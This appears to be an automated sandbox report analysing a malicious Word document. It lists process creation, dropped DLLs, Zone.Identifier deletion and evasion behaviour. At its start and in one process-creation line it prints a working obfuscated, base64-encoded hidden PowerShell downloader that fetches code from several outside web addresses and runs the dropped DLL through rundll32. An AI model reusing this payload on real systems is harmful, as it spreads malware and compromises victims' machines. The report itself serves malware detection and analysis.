AfQAnACsAJwBMAGkAcQA4AGwANQA4AHsAMAB9ACcAKwAoACcARQBnACcAKwAnAG8AJwApACsAJwBrADcAJwArACcAZQBpAHsAMAB9ACcAKQAgAC0AZgAgAFsAQwBoAGEAcgBdADkAMgApACsAJABHAHEAaAAwAGoAXwBiACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABLADYAOQBXAD0AKAAoACcASAA4ACcAKwAnADkAJwApACsAJwBZACcAKQA7ACQAVABrADEAcQB3AHQAOQA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAE8AeQBsAHgAMQBkAGMAPQAoACgAJwB4ACAAWwAnACsAJwAgAHMAJwArACcAaAAnACkAKwAnACAAYgAnACsAJwA6ACcAKwAnAC8AJwArACgAJwAvAG4AJwArACcAYQBkAHkAJwApACsAJwBzACcAKwAoACcAYQAnACsAJwAuAGMAJwApACsAJwBvAG0AJwArACgAJwAvACcAKwAnAHcAJwArACcAcAAnACsAJwAtAGMAbwBuAHQAZQAnACkAKwAnAG4AdAAnACsAJwAvAEEAJwArACgAJwBsAG0AJwArACcAZQB0ACcAKQArACcALwAnACsAJwAhACcAKwAoACcAeAAnACsAJwAgAFsAJwApACsAKAAnACAAcwBoACAAYgAnACsAJwA6AC8ALwBiACcAKwAnAG8AbwBtACcAKwAnAGEAcgBrACcAKQArACgAJwBlAHQAZQAnACsAJwByAC4AJwArACcAYwBvACcAKQArACgAJwBtACcAKwAnAC8AdwAnACkAKwAoACcAcAAtAGMAJwArACcAbwBuAHQAJwArACcAZQAnACkAKwAnAG4AdAAnACsAKAAnAC8AJwArACcANgAvACcAKQArACcAIQAnACsAKAAnAHgAIAAnACsAJwBbACAAcwBoACcAKQArACgAJwAgACcAKwAnAGIAOgAnACkAKwAnAC8ALwAnACsAKAAnAGMAcgBvAG8AJwArACcAawAnACsAJwBzAC0AdABhAHkAbABvAHIAJwApACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAnACsAJwAvACcAKwAoACcAMQA2ACcAKwAnADcANgAnACkAKwAnADQANwAnACsAKAAnADAAOQA3ADMAJwArACcALwAxAC8AIQAnAC
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQBUAC0AaQBUAEUAbQAgACgAIgB2AEEAUgBpACIAKwAiAGEAYgBMAGUAOgAwAGkAIgArACIAOQBmACIAKwAiAFoAYgAiACkAIAAgACgAIABbAFQAWQBwAEUAXQAoACIAewAxAH0AewAyAH0AewA0AH0AewA1AH0AewAwAH0AewAzAH0AewA2AH0AIgAgAC0ARgAgACcAVABPACcALAAnAFMAWQBTAFQAZQAnACwAJwBNAC4ASQBvAC4AZABpACcALAAnAFIAJwAsACcAcgBlACcALAAnAEMAJwAsACcAWQAnACkAIAAgACkAIAAgADsAIAAgACAAJAB5AHcATQA5AG4AIAA9AFsAdABZAFAARQBdACgAIgB7ADUAfQB7ADAAfQB7ADMAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwBuAEUAdAAuAHMAZQBSAFYAJwAsACcAZQBSACcALAAnAEkAbgBUACcALAAnAGkAQwBFAFAAbwAnACwAJwBtAGEATgBBAEcAJwAsACcAUwBZAHMAdABFAE0ALgAnACkAIAAgADsAIAAgACQAUwA0AGsANgB0AHIAagA9ACQATgA2ADkARwAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQATwAyAF8AUAA7ACQARwAxADQAUQA9ACgAJwBVACcAKwAoACcAMwAnACsAJwA2AE4AJwApACkAOwAgACQAMABJADkAZgB6AGIAOgA6ACIAQwBSAGUAYQB0AGAARQBEAGkAcgBFAGAAYwBUAE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwAyAE8AYgBMACcAKwAnAGkAJwArACcAcQAnACkAKwAnADgAbAAnACsAJwA1ACcAKwAnADgAJwArACgAJwAyACcAKwAnAE8AYgBFAGcAJwApACsAKAAnAG8AJwArACcAawA3AGUAaQAnACkAKwAoACcAMgBPACcAKwAnAGIAJwApACkAIAAtAEMAUgBlAHAATABBAGMARQAgACgAWwBDAGgAQQBSAF0ANQAwACsAWwBDAGgAQQBSAF0ANwA5ACsAWwBDAGgAQQBSAF0AOQA4ACkALABbAEMAaABBAFIAXQA5ADIAKQApADsAJABPADIAXwBZAD0AKAAoACcAVAAnACsAJwAzADUAJwApACsAJwBEACcAKQA7ACAAKAAgACAAZwBDAGkAIAAgAFYAQQBSAEkAQQBiAGwARQA6AHkAdwBtADkATgAgACkALgBWAGEAbAB1AGUAOgA6ACIAUwBFAGMAdQByAGAAaQBUAFkAcABgAFIAbwB0AGAAbwBDAG8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAUwA3ADcATgA9ACgAJwBBACcAKwAoACcAOAAxACcAKwAnAFcAJwApACkAOwAkAEcAcQBoADAAagBfAGIAIAA9ACAAKAAnAEQAJwArACgAJwA2ACcAKwAnADQATwAnACkAKQA7ACQAVwA4ADYATwA9ACgAKAAnAEMAJwArACcANAA3ACcAKQArACcARgAnACkAOwAkAE0AdABuADAANQB2AHIAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQAnACsAJwBMAGkAcQA4AGwANQA4AHsAMAB9ACcAKwAoACcARQBnACcAKwAnAG8AJwApACsAJwBrADcAJwArACcAZQBpAHsAMAB9ACcAKQAgAC0AZgAgAFsAQwBoAGEAcgBdADkAMgApACsAJABHAHEAaAAwAGoAXwBiACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABLADYAOQBXAD0AKAAoACcASAA4ACcAKwAnADkAJwApACsAJwBZACcAKQA7ACQAVABrADEAcQB3AHQAOQA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAE8AeQBsAHgAMQBkAGMAPQAoACgAJwB4ACAAWwAnACsAJwAgAHMAJwArACcAaAAnACkAKwAnACAAYgAnACsAJwA6ACcAKwAnAC8AJwArACgAJwAvAG4AJwArACcAYQBkAHkAJwApACsAJwBzACcAKwAoACcAYQAnACsAJwAuAGMAJwApACsAJwBvAG0AJwArACgAJwAvACcAKwAnAHcAJwArACcAcAAnACsAJwAtAGMAbwBuAHQAZQAnACkAKwAnAG4AdAAnACsAJwAvAEEAJwArACgAJwBsAG0AJwArACcAZQB0ACcAKQArACcALwAnACsAJwAhACcAKwAoACcAeAAnACsAJwAgAFsAJwApACsAKAAnACAAcwBoACAAYgAnACsAJwA6AC8ALwBiACcAKwAnAG8AbwBtACcAKwAnAGEAcgBrACcAKQArACgAJwBlAHQAZQAnACsAJwByAC4AJwArACcAYwBvACcAKQArACgAJwBtACcAKwAnAC8AdwAnACkAKwAoACcAcAAtAGMAJwArACcAbwBuAHQAJwArACcAZQAnACkAKwAnAG4AdAAnACsAKAAnAC8AJwArACcANgAvACcAKQArACcAIQAnACsAKAAnAHgAIAAnACsAJwBbACAAcwBoACcAKQArACgAJwAgACcAKwAnAGIAOgAnACkAKwAnAC8ALwAnACsAKAAnAGMAcgBvAG8AJwArACcAawAnACsAJwBzAC0AdABhAHkAbABvAHIAJwApACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAnACsAJwAvACcAKwAoACcAMQA2ACcAKwAnADcANgAnACkAKwAnADQANwAnACsAKAAnADAAOQA3ADMAJwArACcALwAxAC8AIQAnAC
                      Source: D64O.dll.5.drStatic PE information: real checksum: 0x5c7a7 should be: 0x57fde
                      Source: D64O.dll.5.drStatic PE information: section name: .text4
                      Source: D64O.dll.5.drStatic PE information: section name: .text8
                      Source: D64O.dll.5.drStatic PE information: section name: .text7
                      Source: D64O.dll.5.drStatic PE information: section name: .text6
                      Source: D64O.dll.5.drStatic PE information: section name: .text5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002108D0 push edx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F39A0 push cs; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F2A01 push esi; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F5BD8 push ss; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F5C29 push ss; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F548F push ebp; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F2CFB push ecx; retn 001Eh
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F1740 push DA0FDC41h; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002108D0 push edx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F39A0 push cs; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F2A01 push esi; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F5BD8 push ss; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F5C29 push ss; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F548F push ebp; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F2CFB push ecx; retn 001Eh
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F1740 push DA0FDC41h; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001908D0 push edx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001739A0 push cs; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00172A01 push esi; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00175BD8 push ss; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00175C29 push ss; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0017548F push ebp; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00172CFB push ecx; retn 001Eh
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00171740 push DA0FDC41h; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002808D0 push edx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002639A0 push cs; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00262A01 push esi; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00265BD8 push ss; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00265C29 push ss; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0026548F push ebp; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00262CFB push ecx; retn 001Eh

                      Persistence and Installation Behavior:

                      barindex
                      Creates processes via WMIShow sources
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Liq8l58\Egok7ei\D64O.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exePE file moved: C:\Windows\SysWOW64\Sqnknlpyv\hvpedfkj.tanJump to behavior

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Sqnknlpyv\hvpedfkj.tan:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Ceelf\ceht.ynf:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Gstbghdcbll\xymuoataos.ccr:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Lzlvyublnqyq\ovcucjzboyk.nwn:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Woooizzjxmgfwuv\lldxvtebowotvy.flt:Zone.Identifier read attributes | delete
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2508Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                      Source: powershell.exe, 00000005.00000002.2086476389.0000000000344000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10001D4D mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory protected: page execute read | page guard

